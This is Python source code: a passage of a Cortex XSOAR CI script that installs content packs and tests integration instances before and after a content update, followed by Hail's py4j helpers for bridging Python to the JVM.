f'Configuring integration "{integration["name"]}" with proxy=True')
else:
integration['params'].update({'proxy': False})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=False')
return True
def set_module_params(param_conf, integration_params):
"""Configure a parameter object for use in a module instance.
Each integration parameter is actually an object with many fields that together describe it. E.g. a given
parameter will have all of the following fields - "name", "display", "value", "hasvalue", "defaultValue",
etc. This function fills the "value" field for a parameter configuration object and returns it for use in
a module instance.
Args:
param_conf (dict): The parameter configuration object.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
Returns:
(dict): The configured parameter object
"""
if param_conf['display'] in integration_params or param_conf['name'] in integration_params:
# param defined in conf
key = param_conf['display'] if param_conf['display'] in integration_params else param_conf['name']
if key == 'credentials':
credentials = integration_params[key]
param_value = {
'credential': '',
'identifier': credentials['identifier'],
'password': credentials['password'],
'passwordChanged': False
}
else:
param_value = integration_params[key]
param_conf['value'] = param_value
param_conf['hasvalue'] = True
elif param_conf['defaultValue']:
# if the parameter doesn't have a value provided in the integration's configuration values
# but does have a default value then assign it to the parameter for the module instance
param_conf['value'] = param_conf['defaultValue']
return param_conf
def __set_server_keys(client, integration_params, integration_name):
"""Adds server configuration keys using the demisto_client.
Args:
client (demisto_client): The configured client to use.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
integration_name (str): The name of the integration which the server configurations keys are related to.
"""
if 'server_keys' not in integration_params:
return
logging.info(f'Setting server keys for integration: {integration_name}')
data: dict = {
'data': {},
'version': -1
}
for key, value in integration_params.get('server_keys').items():
data['data'][key] = value
update_server_configuration(
client=client,
server_configuration=data,
error_msg='Failed to set server keys'
)
def set_integration_instance_parameters(integration_configuration,
integration_params,
integration_instance_name,
is_byoi,
client):
"""Set integration module values for integration instance creation
The integration_configuration and integration_params should match, in that
they are for the same integration
Arguments:
integration_configuration: (dict)
dictionary of the integration configuration parameters/keys that need
filling to instantiate an instance of a given integration
integration_params: (dict)
values for a given integration taken from the configuration file in
which the secret values are stored to configure instances of various
integrations
integration_instance_name: (str)
The name of the integration instance being configured if there is one
provided in the conf.json
is_byoi: (bool)
If the integration is byoi or not
client: (demisto_client)
The client to connect to
Returns:
(dict): The configured module instance to send to the Demisto server for
instantiation.
"""
module_configuration = integration_configuration.get('configuration', {})
if not module_configuration:
module_configuration = []
if 'integrationInstanceName' in integration_params:
instance_name = integration_params['integrationInstanceName']
else:
instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
# define module instance
module_instance = {
'brand': integration_configuration['name'],
'category': integration_configuration['category'],
'configuration': integration_configuration,
'data': [],
'enabled': "true",
'engine': '',
'id': '',
'isIntegrationScript': is_byoi,
'name': instance_name,
'passwordProtected': False,
'version': 0
}
# set server keys
__set_server_keys(client, integration_params, integration_configuration['name'])
# set module params
for param_conf in module_configuration:
configured_param = set_module_params(param_conf, integration_params)
module_instance['data'].append(configured_param)
return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
"""
Filter integrations into their respective lists - new, modified or unchanged. if it's on the skip list, then
skip if random tests were chosen then we may be configuring integrations that are neither new or modified.
Args:
integrations (list): The integrations to categorize.
skipped_integrations_conf (dict): Integrations that are on the skip list.
new_integrations_names (list): The names of new integrations.
modified_integrations_names (list): The names of modified integrations.
Returns:
(tuple): Lists of integrations objects as well as an Integration-to-Status dictionary useful for logs.
"""
new_integrations = []
modified_integrations = []
unchanged_integrations = []
integration_to_status = {}
for integration in integrations:
integration_name = integration.get('name', '')
if integration_name in skipped_integrations_conf.keys():
continue
if integration_name in new_integrations_names:
new_integrations.append(integration)
elif integration_name in modified_integrations_names:
modified_integrations.append(integration)
integration_to_status[integration_name] = 'Modified Integration'
else:
unchanged_integrations.append(integration)
integration_to_status[integration_name] = 'Unchanged Integration'
return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
"""Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
Args:
test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
instance names.
skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
the skip reason as values.
Returns:
(list): List of integration objects to configure.
"""
integrations_conf = test.get('integrations', [])
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf]
integrations = [
{'name': integration, 'params': {}} for
integration in integrations_conf if integration not in skipped_integrations_conf
]
return integrations
def update_content_on_demisto_instance(client, server, ami_name):
"""Try to update the content
Args:
client (demisto_client): The configured client to use.
server (str): The server url to pass to Tests/update_content_data.py
"""
content_zip_path = 'artifacts/all_content.zip'
update_content(content_zip_path, server=server, client=client)
# Check if content update has finished installing
sleep_interval = 20
updating_content = is_content_update_in_progress(client)
while updating_content.lower() == 'true':
sleep(sleep_interval)
updating_content = is_content_update_in_progress(client)
if updating_content.lower() == 'request unsuccessful':
# since the request to check if content update installation finished didn't work, can't use that mechanism
# to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
sleep(30)
else:
# check that the content installation updated
# verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
release, asset_id = get_content_version_details(client, ami_name)
logging.info(f'Content Release Version: {release}')
with open('./artifacts/content-descriptor.json', 'r') as cd_file:
cd_json = json.loads(cd_file.read())
cd_release = cd_json.get('release')
cd_asset_id = cd_json.get('assetId')
if release == cd_release and asset_id == cd_asset_id:
logging.success(f'Content Update Successfully Installed on server {server}.')
else:
logging.error(
f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
f'were retrieved from the instance post installation.')
if ami_name not in MARKET_PLACE_MACHINES:
sys.exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
new_integrations_names, build=None):
"""Prints errors and/or warnings if there are any and returns whether whether testing was successful or not.
Args:
preupdate_fails (set): List of tuples of integrations that failed the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_fails (set): List of tuples of integrations that failed the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
preupdate_success (set): List of tuples of integrations that succeeded the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_success (set): List of tuples of integrations that succeeded the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
new_integrations_names (list): List of the names of integrations that are new since the last official
content release and that will only be present on the demisto instance after the content update is
performed.
build: Build object
Returns:
(bool): False if there were integration instances that succeeded prior to the content update and then
failed after content was updated, otherwise True.
"""
testing_status = True
# a "Test" can be either successful both before and after content update(succeeded_pre_and_post variable),
# fail on one of them(mismatched_statuses variable), or on both(failed_pre_and_post variable)
succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
if succeeded_pre_and_post:
succeeded_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in succeeded_pre_and_post])
logging.success(
'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
f'{succeeded_pre_and_post_string}')
failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
mismatched_statuses = postupdate_fails - preupdate_fails
failed_only_after_update = []
failed_but_is_new = []
for instance_name, integration_of_instance in mismatched_statuses:
if integration_of_instance in new_integrations_names:
failed_but_is_new.append((instance_name, integration_of_instance))
else:
failed_only_after_update.append((instance_name, integration_of_instance))
# warnings but won't fail the build step
if failed_but_is_new:
failed_but_is_new_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_but_is_new])
logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
if failed_pre_and_post:
failed_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_pre_and_post])
logging.warning(f'Integration instances that had ("Test" Button) failures '
f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
# fail the step if there are instances that only failed after content was updated
if failed_only_after_update:
failed_only_after_update_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in failed_only_after_update])
testing_status = False
logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
f'{pformat(failed_only_after_update_string)}.\n'
f'This indicates that your updates introduced breaking changes to the integration.')
else:
# creating this file to indicates that this instance passed post update tests
if build:
with open("./Tests/is_post_update_passed_{}.txt".format(build.ami_env.replace(' ', '')), 'a'):
pass
return testing_status
def get_env_conf():
if Build.run_environment == Running.CI_RUN:
return get_json_file(Build.env_results_path)
if Build.run_environment == Running.WITH_LOCAL_SERVER:
# START CHANGE ON LOCAL RUN #
return [{
"InstanceDNS": "http://localhost:8080",
"Role": "Server Master" # e.g. 'Server Master'
}]
if Build.run_environment == Running.WITH_OTHER_SERVER:
return [{
"InstanceDNS": "DNS NANE", # without http prefix
"Role": "DEMISTO EVN" # e.g. 'Server Master'
}]
# END CHANGE ON LOCAL RUN #
return None
def map_server_to_port(env_results, instance_role):
"""
Arguments:
env_results: (dict)
env_results.json in server
instance_role: (str)
The amazon machine image environment whose IP we should connect to.
Returns:
(lst): The server url list to connect to
"""
ip_to_port_map = {env.get('InstanceDNS'): env.get('TunnelPort') for env in env_results if
instance_role in env.get('Role', '')}
return ip_to_port_map
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def configure_servers_and_restart(build):
manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
for server in build.servers:
configurations = dict()
configure_types = []
if is_redhat_instance(server.internal_ip):
configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
configurations.update(NO_PROXY_CONFIG)
configurations['python.pass.extra.keys'] += "##--network=slirp4netns:cidr=192.168.0.0/16"
else:
configurations.update(DOCKER_HARDENING_CONFIGURATION)
configure_types.append('docker hardening')
configure_types.append('marketplace')
configurations.update(MARKET_PLACE_CONFIGURATION)
error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
if manual_restart:
input('restart your server and then press enter.')
else:
logging.info('Done restarting servers. Sleeping for 1 minute')
sleep(60)
def get_tests(build: Build) -> List[dict]:
"""
Selects the tests from that should be run in this execution and filters those that cannot run in this server version
Args:
build: Build object
Returns:
Test configurations from conf.json that should be run in this execution
"""
server_numeric_version: str = build.server_numeric_version
tests: dict = build.tests
if Build.run_environment == Running.CI_RUN:
filtered_tests = BuildContext._extract_filtered_tests()
if build.is_nightly:
# skip test button testing
logging.debug('Not running instance tests in nightly flow')
tests_for_iteration = []
else:
tests_for_iteration = [test for test in tests
if not filtered_tests or test.get('playbookID', '') in filtered_tests]
tests_for_iteration = filter_tests_with_incompatible_version(tests_for_iteration, server_numeric_version)
return tests_for_iteration
# START CHANGE ON LOCAL RUN #
return [
{
"playbookID": "Docker Hardening Test",
"fromversion": "5.0.0"
},
{
"integrations": "SplunkPy",
"playbookID": "SplunkPy-Test-V2",
"memory_threshold": 500,
"instance_names": "use_default_handler"
}
]
# END CHANGE ON LOCAL RUN #
def get_changed_integrations(build: Build) -> tuple:
"""
Return 2 lists - list of new integrations and list of modified integrations since the commit of the git_sha1.
Args:
build: the build object
Returns:
list of new integrations and list of modified integrations
"""
new_integrations_files, modified_integrations_files = get_new_and_modified_integration_files(
build.branch_name) if not build.is_private else ([], [])
new_integrations_names, modified_integrations_names = [], []
if new_integrations_files:
new_integrations_names = get_integration_names_from_files(new_integrations_files)
logging.debug(f'New Integrations Since Last Release:\n{new_integrations_names}')
if modified_integrations_files:
modified_integrations_names = get_integration_names_from_files(modified_integrations_files)
logging.debug(f'Updated Integrations Since Last Release:\n{modified_integrations_names}')
return new_integrations_names, modified_integrations_names
def nightly_install_packs(build, install_method=None, pack_path=None, service_account=None):
threads_list = []
if not install_method:
raise Exception('Install method was not provided.')
# For each server url we install pack/ packs
for server in build.servers:
kwargs = {'client': server.client, 'host': server.internal_ip}
if service_account:
kwargs['service_account'] = service_account
if pack_path:
kwargs['pack_path'] = pack_path
threads_list.append(Thread(target=install_method, kwargs=kwargs))
run_threads_list(threads_list)
def install_nightly_pack(build):
nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
service_account=build.service_account)
create_nightly_test_pack()
nightly_install_packs(build, install_method=upload_zipped_packs,
pack_path=f'{Build.test_pack_target}/test_pack.zip')
logging.info('Sleeping for 45 seconds while installing nightly packs')
sleep(45)
def install_packs(build, pack_ids=None):
pack_ids = build.pack_ids_to_install if pack_ids is None else pack_ids
installed_content_packs_successfully = True
for server in build.servers:
try:
_, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
if not flag:
raise Exception('Failed to search and install packs.')
except Exception:
logging.exception('Failed to search and install packs')
installed_content_packs_successfully = False
return installed_content_packs_successfully
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
modified_module_instances = []
new_module_instances = []
testing_client = build.servers[0].client
for test in tests_for_iteration:
integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
playbook_id = test.get('playbookID')
new_integrations, modified_integrations, unchanged_integrations, integration_to_status = group_integrations(
integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
)
integration_to_status_string = '\n\t\t\t\t\t\t'.join(
[f'"{key}" - {val}' for key, val in integration_to_status.items()])
if integration_to_status_string:
logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
else:
logging.info(f'No Integrations for test "{playbook_id}"')
instance_names_conf = test.get('instance_names', [])
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf]
integrations_to_configure = modified_integrations[:]
integrations_to_configure.extend(unchanged_integrations)
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
new_ints_params_set = set_integration_params(build,
new_integrations,
build.secret_conf['integrations'],
instance_names_conf,
placeholders_map)
ints_to_configure_params_set = set_integration_params(build,
integrations_to_configure,
build.secret_conf['integrations'],
instance_names_conf, placeholders_map)
if not new_ints_params_set:
logging.error(f'failed setting parameters for integrations: {new_integrations}')
if not ints_to_configure_params_set:
logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
if not (new_ints_params_set and ints_to_configure_params_set):
continue
modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
build,
integrations_to_configure,
new_integrations,
testing_client)
modified_module_instances.extend(modified_module_instances_for_test)
new_module_instances.extend(new_module_instances_for_test)
return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
modified_integrations_to_configure: list,
new_integrations_to_configure: list,
demisto_client_: demisto_client) -> tuple:
"""
Configures old and new integrations in the server configured in the demisto_client.
Args:
build: The build object
modified_integrations_to_configure: Integrations to configure that are already exists
new_integrations_to_configure: Integrations to configure that were created in this build
demisto_client: A demisto client
Returns:
A tuple with two lists:
1. List of configured instances of modified integrations
2. List of configured instances of new integrations
"""
modified_modules_instances = []
new_modules_instances = []
for integration in modified_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client_, placeholders_map)
if module_instance:
modified_modules_instances.append(module_instance)
for integration in new_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client_, placeholders_map)
if module_instance:
new_modules_instances.append(module_instance)
return modified_modules_instances, new_modules_instances
def instance_testing(build: Build,
all_module_instances: list,
pre_update: bool,
use_mock: bool = True,
first_call: bool = True) -> Tuple[set, set]:
"""
Runs 'test-module' command for the instances detailed in `all_module_instances`
Args:
build: An object containing the current build info.
all_module_instances: The integration instances that should be tested
pre_update: Whether this instance testing is before or after the content update on the server.
use_mock: Whether to use mock while testing mockable integrations. Should be used mainly with
private content build which aren't using the mocks.
first_call: indicates if its the first time the function is called from the same place
Returns:
A set of the successful tests containing the instance name and the integration name
A set of the failed tests containing the instance name and the integration name
"""
update_status = 'Pre' if pre_update else 'Post'
failed_tests = set()
successful_tests = set()
# Test all module instances (of modified + unchanged integrations) pre-updating content
if all_module_instances:
# only print start message if there are instances to configure
logging.info(f'Start of Instance Testing ("Test" button) ({update_status}-update)')
else:
logging.info(f'No integrations to configure for the chosen tests. ({update_status}-update)')
failed_instances = []
for instance in all_module_instances:
integration_of_instance = instance.get('brand', '')
instance_name = instance.get('name', '')
# If there is a failure, __test_integration_instance will print it
if integration_of_instance not in build.unmockable_integrations and use_mock:
success = test_integration_with_mock(build, instance, pre_update)
else:
testing_client = build.servers[0].reconnect_client()
success, _ = __test_integration_instance(testing_client, instance)
if not success:
failed_tests.add((instance_name, integration_of_instance))
failed_instances.append(instance)
else:
successful_tests.add((instance_name, integration_of_instance))
# in case some tests failed post update, wait a 15 secs, runs the tests again
if failed_instances and not pre_update and first_call:
logging.info("some post-update tests failed, sleeping for 15 seconds, then running the failed tests again")
sleep(15)
_, failed_tests = instance_testing(build, failed_instances, pre_update=False, first_call=False)
return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
"""
Runs 'test-module' for given integration with mitmproxy
In case the playback mode fails and this is a pre-update run - a record attempt will be executed.
Args:
build: An object containing the current build info.
instance: A dict containing the instance details
pre_update: Whether this instance testing is before or after the content update on the server.
Returns:
The result of running the 'test-module' command for the given integration.
If a record was executed - will return the result of the 'test--module' with the record mode only.
"""
testing_client = build.servers[0].reconnect_client()
integration_of_instance = instance.get('brand', '')
logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
has_mock_file = build.proxy.has_mock_file(integration_of_instance)
success = False
if has_mock_file:
with run_with_mock(build.proxy, integration_of_instance) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
if not success and not pre_update:
logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
return success
def update_content_till_v6(build: Build):
threads_list = []
# For each server url we install content
for server in build.servers:
t = Thread(target=update_content_on_demisto_instance,
kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
threads_list.append(t)
run_threads_list(threads_list)
def disable_instances(build: Build):
for server in build.servers:
disable_all_integrations(server.client)
def create_nightly_test_pack():
test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
packs_root = f'{content_path}/Packs'
packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
for pack_dir in packs:
if pack_dir in SKIPPED_PACKS:
continue
playbooks_root = f'{pack_dir.path}/TestPlaybooks'
if os.path.isdir(playbooks_root):
for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
yield playbook_path, playbook
if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
yield playbook_path, playbook
def get_test_playbooks_in_dir(path):
playbooks = filter(lambda x: x.is_file(), os.scandir(path))
for playbook in playbooks:
yield playbook.path, playbook
def test_pack_metadata():
now = datetime.now().isoformat().split('.')[0]
now = f'{now}Z'
metadata = {
"name": "nightly test",
"id": str(uuid.uuid4()),
"description": "nightly test pack (all test playbooks and scripts).",
"created": now,
"updated": now,
"legacy": True,
"support": "Cortex XSOAR",
"supportDetails": {},
"author": "Cortex XSOAR",
"authorImage": "",
"certification": "certified",
"price": 0,
"serverMinVersion": "6.0.0",
"serverLicense": "",
"currentVersion": "1.0.0",
"general": [],
"tags": [],
"categories": [
"Forensics & Malware Analysis"
],
"contentItems": {},
"integrations": [],
"useCases": [],
"keywords": [],
"dependencies": {}
}
return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
for test_path, test in test_files(content_path):
if not test_path.endswith('.yml'):
continue
test = test.name
with open(test_path, 'r') as test_file:
if not (test.startswith('playbook-') or test.startswith('script-')):
test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
test_file.seek(0)
test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
else:
test_target = f'test_pack/TestPlaybooks/{test}'
zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
"""
:param build: the build object
:return: all non added packs i.e. unchanged packs (dependencies) and modified packs
"""
compare_against = 'origin/master{}'.format('' if not build.branch_name == 'master' else '~1')
added_files = run_command(f'git diff --name-only --diff-filter=A '
f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
if os.getenv('CONTRIB_BRANCH'):
added_contrib_files = run_command(
'git status -uall --porcelain -- Packs/*/pack_metadata.json | grep "?? "').replace('?? ', '')
added_files = added_files if not added_contrib_files else '\n'.join([added_files, added_contrib_files])
added_files = filter(lambda x: x, added_files.split('\n'))
added_pack_ids = map(lambda x: x.split('/')[1], added_files)
return set(build.pack_ids_to_install) - set(added_pack_ids)
def set_marketplace_url(servers, branch_name, ci_build_number):
url_suffix = quote_plus(f'{branch_name}/{ci_build_number}/xsoar')
config_path = 'marketplace.bootstrap.bypass.url'
config = {config_path: f'https://storage.googleapis.com/marketplace-ci-build/content/builds/{url_suffix}'}
for server in servers:
server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
logging.success('Updated marketplace url and restarted servers')
logging.info('sleeping for 60 seconds')
sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
"""
Runs 'test-module on all integrations for post-update check
Args:
build: A build object
new_module_instances: A list containing new integrations instances to run test-module on
modified_module_instances: A list containing old (existing) integrations instances to run test-module on
Returns:
* A list of integration names that have failed the 'test-module' execution post update
* A list of integration names that have succeeded the 'test-module' execution post update
"""
modified_module_instances.extend(new_module_instances)
successful_tests_post, failed_tests_post = instance_testing(build, modified_module_instances, pre_update=False)
return successful_tests_post, failed_tests_post
def update_content_on_servers(build: Build) -> bool:
"""
Updates content on the build's server according to the server version
Args:
build: Build object
Returns:
A boolean that indicates whether the content installation was successful.
If the server version is lower then 5.9.9 will return the 'installed_content_packs_successfully' parameter as is
If the server version is higher or equal to 6.0 - will return True if the packs installation was successful
both before that update and after the update.
"""
installed_content_packs_successfully = True
if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
update_content_till_v6(build)
elif not build.is_nightly:
set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
installed_content_packs_successfully = install_packs(build)
return installed_content_packs_successfully
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
"""
Configures integration instances that exist in the current version and for each integration runs 'test-module'.
Args:
build: Build object
new_integrations: A list containing new integrations names
modified_integrations: A list containing modified integrations names
Returns:
A tuple consists of:
* A list of modified module instances configured
* A list of new module instances configured
* A list of integrations that have failed the 'test-module' command execution
* A list of integrations that have succeeded the 'test-module' command execution
* A list of new integrations names
"""
tests_for_iteration = get_tests(build)
modified_module_instances, new_module_instances = configure_server_instances(build,
tests_for_iteration,
new_integrations,
modified_integrations)
successful_tests_pre, failed_tests_pre = instance_testing(build, modified_module_instances, pre_update=True)
return modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre
def install_packs_pre_update(build: Build) -> bool:
"""
Install packs on server according to server version
Args:
build: A build object
Returns:
A boolean that indicates whether the installation was successful or not
"""
installed_content_packs_successfully = False
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
if build.is_nightly:
install_nightly_pack(build)
installed_content_packs_successfully = True
else:
if not build.is_private:
pack_ids = get_non_added_packs_ids(build)
installed_content_packs_successfully = install_packs(build, pack_ids=pack_ids)
else:
installed_content_packs_successfully = True
return installed_content_packs_successfully
def main():
install_logging('Install_Content_And_Configure_Integrations_On_Server.log', logger=logging)
build = Build(options_handler())
logging.info(f"Build Number: {build.ci_build_number}")
configure_servers_and_restart(build)
disable_instances(build)
install_packs_pre_update(build)
new_integrations, modified_integrations = get_changed_integrations(build)
pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
new_integrations,
modified_integrations)
modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
installed_content_packs_successfully = update_content_on_servers(build)
successful_tests_post, failed_tests_post = test_integrations_post_update(build,
new_module_instances,
modified_module_instances)
success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
new_integrations, build)
if not success or not installed_content_packs_successfully:
sys.exit(2)
if __name__ == '__main__':
main()
|
java.py
|
import json
import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
""":class:`.FatalError` is an error thrown by Hail method failures"""
class Env:
_jvm = None
_gateway = None
_hail_package = None
_jutils = None
_hc = None
_counter = 0
_seed_generator = None
@staticmethod
def get_uid():
Env._counter += 1
return "__uid_{}".format(Env._counter)
@staticmethod
def jvm():
if not Env._jvm:
Env.hc()
assert Env._jvm is not None
return Env._jvm
@staticmethod
def hail():
if not Env._hail_package:
Env._hail_package = getattr(Env.jvm(), 'is').hail
return Env._hail_package
@staticmethod
def gateway():
if not Env._gateway:
Env.hc()
assert Env._gateway is not None
return Env._gateway
@staticmethod
def jutils():
if not Env._jutils:
Env._jutils = scala_package_object(Env.hail().utils)
return Env._jutils
@staticmethod
def hc():
if not Env._hc:
from hail.context import init
import sys
sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
init()
assert Env._hc is not None
return Env._hc
@staticmethod
def backend():
return Env.hc()._backend
@staticmethod
def spark_backend(op):
b = Env.backend()
if isinstance(b, hail.backend.SparkBackend):
return b
else:
raise NotImplementedError(
f"{b.__class__.__name__} doesn't support {op}, only SparkBackend")
@staticmethod
def fs():
return Env.backend().fs
@staticmethod
def spark_session():
return Env.hc()._spark_session
_dummy_table = None
@staticmethod
def dummy_table():
if Env._dummy_table is None:
import hail
Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
return Env._dummy_table
@staticmethod
def set_seed(seed):
Env._seed_generator = hail.utils.HailSeedGenerator(seed)
@staticmethod
def next_seed():
if Env._seed_generator is None:
Env.set_seed(None)
return Env._seed_generator.next_seed()
def jarray(jtype, lst):
jarr = Env.gateway().new_array(jtype, len(lst))
for i, s in enumerate(lst):
jarr[i] = s
return jarr
def scala_object(jpackage, name):
return getattr(getattr(jpackage, name + '$'), 'MODULE$')
def scala_package_object(jpackage):
return scala_object(jpackage, 'package')
def jnone():
return scala_object(Env.jvm().scala, 'None')
def jsome(x):
return Env.jvm().scala.Some(x)
def joption(x):
return jsome(x) if x else jnone()
def from_option(x):
return x.get() if x.isDefined() else None
def jindexed_seq(x):
return Env.jutils().arrayListToISeq(x)
def jset(x):
return Env.jutils().arrayListToSet(x)
def jindexed_seq_args(x):
args = [x] if isinstance(x, str) else x
return jindexed_seq(args)
def jset_args(x):
args = [x] if isinstance(x, str) else x
return jset(args)
def jiterable_to_list(it):
if it is not None:
return list(Env.jutils().iterableToArrayList(it))
else:
return None
def dump_json(obj):
return f'"{escape_str(json.dumps(obj))}"'
def escape_str(s):
return Env.jutils().escapePyString(s)
def parsable_strings(strs):
strs = ' '.join(f'"{escape_str(s)}"' for s in strs)
return f"({strs})"
_parsable_str = re.compile(r'[\w_]+')
def escape_parsable(s):
if _parsable_str.fullmatch(s):
return s
else:
return '`' + s.encode('unicode_escape').decode('utf-8').replace('`', '\\`') + '`'
def unescape_parsable(s):
return bytes(s.replace('\\`', '`'), 'utf-8').decode('unicode_escape')
def escape_id(s):
if re.fullmatch(r'[_a-zA-Z]\w*', s):
return s
else:
return Env.jutils().escapeIdentifier(s)
def jarray_to_list(a):
return list(a) if a else None
class Log4jLogger:
log_pkg = None
@staticmethod
def get():
if Log4jLogger.log_pkg is None:
Log4jLogger.log_pkg = Env.jutils()
return Log4jLogger.log_pkg
def error(msg):
Log4jLogger.get().error(msg)
def warn(msg):
Log4jLogger.get().warn(msg)
def info(msg):
Log4jLogger.get().info(msg)
def handle_java_exception(f):
def deco(*args, **kwargs):
import pyspark
try:
return f(*args, **kwargs)
except py4j.protocol.Py4JJavaError as e:
s = e.java_exception.toString()
# py4j catches NoSuchElementExceptions to stop array iteration
if s.startswith('java.util.NoSuchElementException'):
raise
tpl = Env.jutils().handleForPython(e.java_exception)
deepest, full = tpl._1(), tpl._2()
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
except pyspark.sql.utils.CapturedException as e:
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None
return deco
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
